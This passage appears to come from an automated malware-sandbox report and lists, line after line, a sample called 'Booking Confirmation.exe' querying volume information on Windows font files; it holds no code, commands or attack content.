Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation			Jump to behavior
Source: C:\Users\user\Desktop\Booking Confirmation.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation			Jump to behavior
